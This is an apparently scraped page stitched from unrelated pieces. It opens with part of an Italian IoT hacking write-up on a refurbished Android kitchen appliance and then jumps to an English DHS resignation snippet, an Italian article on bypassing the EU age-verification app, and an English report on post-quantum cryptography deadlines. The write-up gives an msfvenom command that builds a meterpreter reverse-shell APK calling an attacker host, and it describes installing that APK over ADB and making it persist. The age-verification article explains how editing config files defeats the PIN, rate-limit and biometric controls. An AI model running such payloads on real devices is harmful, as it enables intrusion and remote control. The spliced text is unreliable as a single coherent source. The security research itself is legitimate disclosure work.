URL hardcodati — APK 1URL hardcodati — APK 2
Stavo andando di fretta, quindi ho lanciato MobSF per ottenere una panoramica rapida del livello di rischio: (TL;DR: Niente di terribile)
Complessivamente, è chiaro che esiste il potenziale per weaponizzare questo dispositivo con un APK personalizzato controllabile da remoto da un attaccante, per manipolare le funzioni interne e causare danni fisici, bypassare le misure di sicurezza? Surriscaldare la pentola? Pensateci…
Scherzi e reverse shell
Come ultimo esercizio, volevo verificare se una meterpreter reverse shell avrebbe funzionato e se attraverso di essa avrei potuto far girare DOOM o fare qualche scherzo a mia moglie…
Step 1: generare l’APK meterpreter
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP_ATTACCANTE> LPORT=31337 -f raw -o revshell.apk
Output del comando msfvenom
Step 2: push e installazione via ADB
ADB push e installazione
Step 3: esecuzione
Esecuzione dell’APK reverse shell
Step 4: listener MSF su WHIDOS VM
Configurazione listener MSF
Ora ad ogni riavvio del dispositivo la reverse shell si esegue automaticamente e chiama il C2 dell’attaccante:
Callback della reverse shell
A questo punto installare ed eseguire DOOM era questione di secondi… 😀
DOOM in esecuzione sul dispositivoScreenshot di DOOM
Conclusione
L’analisi condotta su questo comune elettrodomestico IoT ha evidenziato, in modo inequivocabile, come vulnerabilità elementari e ben note continuino ad affliggere dispositivi commercializzati e acquistati da milioni di utenti. L’assenza di un factory reset prima della rivendita, una console UART di debug aperta e accessibile fisicamente, un sistema operativo Android 4.4.2, rilasciato nel 2013 e privo di patch di sicurezza dal 2017,, e la possibilità di installare payload arbitrari tramite ADB: non si tratta di zero-day sofisticati, ma di negligenze di base che un adeguato processo di security testing avrebbe dovuto rilevare ed eliminare prima della commercializzazione del prodotto.
Le implicazioni concrete di queste lacune non sono banali: il riscaldatore e il motore del dispositivo sono interamente controllabili da remoto via appe, in uno scenario di compromissione, anche da un attaccante. Un dispositivo trasformato in un vettore di danno fisico non è più uno scenario ipotetico, ma una possibilità tecnica dimostrata. Analogamente, il tema dei dispositivi ricondizionati che cambiano mano senza un adeguato processo di sanitizzazione rappresenta un rischio concreto per la privacy degli utenti, con dati e associazioni di account del precedente proprietario ancora accessibili al nuovo acquirente.
Dal punto di vista normativo, scenari come questo sono esattamente ciò che il Cyber Resilience Act intende prevenire. I requisiti essenziali di sicurezza introdotti dal CRA – tra cui la disabilitazione delle interfacce di debug in produzione, l’uso di credenziali predefinite uniche, la fornitura di aggiornamenti di sicurezza e la gestione strutturata delle vulnerabilità – avrebbero direttamente mitigato le vulnerabilità identificate in questo caso. I produttori che non si adegueranno a questi requisiti non solo esporranno i propri clienti a rischi concreti, ma si troveranno impossibilitati a commercializzare i propri prodotti nel mercato europeo a partire dall’11 dicembre 2027.
Profilo Autore
Luca Bongiorni attualmente ricopre il ruolo di Direttore del Cybersecurity Lab di ZTE Italia. Negli anni ha maturato un’esperienza professionale a livello internazionale nel ramo della Sicurezza Informatica. Specializzandosi perlopiù sul lato offensivo della materia. Luca ha anche contribuito al mondo InfoSec attraverso la divulgazione delle sue ricerce inerenti diverse tematiche presso le più importanti conferenze del settore (i.e. BlackHat, DEFCON, HackInParis, TROOPERS, OWASP Chapters, Hardwear.ioetc.). Al momento, oltre ad occuparsi quotidianamente di 5G Security, lavora a ricerce a-latere inerenti l’analisi forense di apparti IIoT, il bypass di sistemi di accesso a controllo biometrico ed allo sviluppo di device IoOT (Internet of Offensive Things).
Homeland Security Secretary Markwayne Mullin revealed Lyons’ impending resignation, stating, “We wish him luck on his next opportunity in the private sector.”
A reason behind the resignation was not given. His departure coincides with new DHS leadership after former Secretary Kristi Noem was fired by President Trump.
At this time, it is unclear who will replace Lyons.
La nuova app europea per la verifica dell’età, presentata come soluzione privacy-friendly per l’accesso ai servizi online, è finita immediatamente sotto scrutinio e non ne è uscita bene. A poche ore dal lancio, un ricercatore di sicurezza ha dimostrato come sia possibile aggirare i meccanismi di protezione in meno di due minuti, sollevando dubbi sulla solidità dell’architettura e sulla reale efficacia del sistema.
Il progetto, promosso dalla Commissione europea, nasce con l’obiettivo di consentire agli utenti di dimostrare la propria età senza condividere dati personali con le piattaforme, riducendo la necessità di raccolta e gestione di informazioni sensibili. Un approccio che punta a coniugare compliance normativa e tutela della privacy, ma che, secondo i primi riscontri tecnici, potrebbe introdurre nuove superfici di attacco.
Un bypass semplice ma strutturale
Le criticità evidenziate non riguardano una vulnerabilità isolata, ma scelte progettuali che espongono il sistema a manipolazioni dirette da parte dell’utente. Secondo quanto emerso, l’app memorizza localmente un PIN cifrato, ma senza legarlo in modo sicuro al vault identitario che contiene i dati di verifica.
Questo dettaglio apre la strada a un attacco relativamente semplice. Modificando alcuni file di configurazione e riavviando l’applicazione, è possibile reimpostare il PIN mantenendo l’accesso alle credenziali già generate, di fatto riutilizzando dati di identità sotto un nuovo controllo di accesso. Il risultato è un sistema che accetta credenziali precedenti senza una reale validazione del contesto.
Controlli aggirabili e sicurezza “resettable”
Ulteriori criticità emergono nei meccanismi di difesa contro attacchi più aggressivi. Il sistema di rate limiting, fondamentale per prevenire tentativi ripetuti di accesso, è implementato come un semplice contatore salvato nello stesso file di configurazione modificabile. Azzerando questo valore, l’app perde memoria dei tentativi effettuati, rendendo possibili attacchi di forza bruta.
Anche l’autenticazione biometrica risulta vulnerabile. La sua attivazione è gestita tramite un flag booleano: modificandolo manualmente, è possibile disabilitare completamente il controllo, bypassando uno dei principali livelli di sicurezza previsti.
In altre parole: i controlli di sicurezza possono essere alterati direttamente dall’utente, compromettendo l’intero modello di fiducia dell’applicazione.
Un problema di design più che di bug
La reazione della comunità di sicurezza è stata immediata. Diversi esperti hanno sottolineato come il problema non sia riconducibile a un semplice bug, ma a una progettazione che non tiene conto dei principi fondamentali della sicurezza mobile.
In particolare, è stata evidenziata l’assenza di integrazione con componenti hardware sicuri, come il secure enclave presente sui dispositivi moderni, che avrebbe potuto proteggere le informazioni critiche da modifiche locali.
Altri dubbi riguardano la logica stessa del sistema, inclusa la presenza di limiti temporali sulle credenziali di età. Un approccio che solleva interrogativi sull’effettiva coerenza del modello, considerando che l’età anagrafica non è un attributo soggetto a variazioni retroattive.
Una sicurezza ancora da dimostrare
L’episodio evidenzia un punto critico per il futuro della regolamentazione digitale: la sicurezza non può essere un elemento secondario rispetto alla compliance normativa. Soluzioni progettate per proteggere gli utenti rischiano di ottenere l’effetto opposto se non supportate da architetture robuste e da una corretta implementazione dei controlli.
C’è da dire che l’approccio di rendere open source il codice dell’app testimonia la buona volontà dell’Unione e traccia un bel precedente di trasparenza e solidità. L’app, infatti, non è ancora scaricabile e la community si è attivata su Github per studiarla prima che potesse far danni. Chi è stato incaricato dello sviluppo è già al lavoro per tappare le numerose falle trovate e seguire i (saggi) consigli ricevuti dalla comunità di sicurezza.
D’altro canto, è abbastanza desolante il fatto che l’Unione costringa le aziende ad assumere una postura di sicurezza ben strutturata con norme severe e poi crei un’app che sembra un colabrodo per la gestione degli accessi online basati sull’età. Speriamo che questa cantonata insegni qualcosa per i progetti futuri.
Recent advances push Big Tech closer to the Q-Day danger zone
Interestingly, Amazon is using SigV4, an impromptu algorithm it developed in-house to make authentication quantum-safe.
“AWS limits the transmission of these secrets to the moment of generation,” Campagna wrote. “Once initially distributed, it is never re-sent to the customer. While we made this decision to operate at the massive scale of AWS, we avoided the need to migrate [to] a public-key based authentication solution.”
For customers who need long-lived roots of trust, Amazon uses its AWS Private CA (certificate authority) with KMS, a key management service that complies with FIPS 204, a NIST certification for post-quantum readiness. Customer data at rest is encrypted and then stored using AES-256, a symmetric algorithm that quantum computers have no advantage over classical computing in breaking.
The most distant PQC readiness deadline is 2033 for Microsoft. Meta and Apple didn’t provide any date at all when asked earlier this week.
“Post-quantum cryptography (PQC) isn’t a flip-the-switch change,” Mark Russinovich, Azure CTO and deputy CISO and technical fellow at Microsoft, wrote in an email. “We have been at the forefront of PQC planning since 2014 as a founding member of the Open Quantum Safe project and a close collaborator with vendors, standards bodies, and government agencies.”
He added that Microsoft’s rollout is guided by three principles: “Prioritize standards—follow NIST, not proprietary crypto; avoid breaking global customers; and roll out in a platform-focused way, starting with Windows, Azure, and identity layers. This mirrors past transitions with SHA and TLS, but with greater urgency given quantum risk.” Note that Russinovich didn’t mention Microsoft’s migration off of MD5.
Meta, meanwhile, hasn’t publicly stated its deadline. On Thursday, the company published a post that mostly rehashed a previous one from two years ago. Neither set a deadline. Instead, Thursday’s post was aimed at advising the industry on key principles. It also introduced a taxonomy of “PQC maturity levels.” They are PQ hardened, PQ ready, PQ aware, and PQ unaware.
